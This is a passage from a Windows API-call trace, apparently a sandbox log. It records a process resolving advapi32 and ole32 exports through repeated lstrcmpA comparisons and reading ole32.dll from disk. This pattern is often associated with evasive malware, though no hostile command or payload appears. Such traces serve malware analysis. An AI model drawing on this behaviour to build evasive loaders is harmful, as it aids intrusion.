(lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.491] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.492] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0245.493] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0245.493] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0245.493] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0245.848] GetProcessHeap () returned 0x4e0000 [0245.849] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d22010 | out: hHeap=0x4e0000) returned 1 [0245.971] GetProcessHeap () returned 0x4e0000 [0245.971] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f90c0 [0245.971] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0245.971] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0245.971] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0245.971] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0245.972] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0245.973] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0245.973] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0245.973] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0245.973] GetProcessHeap () returned 0x4e0000 [0245.973] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x142d00) returned 0x40e1040 [0245.977] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0245.977] ReadFile (in: hFile=0x140, lpBuffer=0x40e1040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e1040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0246.016] CloseHandle (hObject=0x140) returned 1 [0246.016] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0246.016] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0246.016] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0246.017] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0246.018] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0246.018] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0246.019] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0246.019] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0246.019] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0246.019] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.019] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.020] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0246.020] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0246.021] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0246.021] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0246.022] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0246.022] lstrcmpA 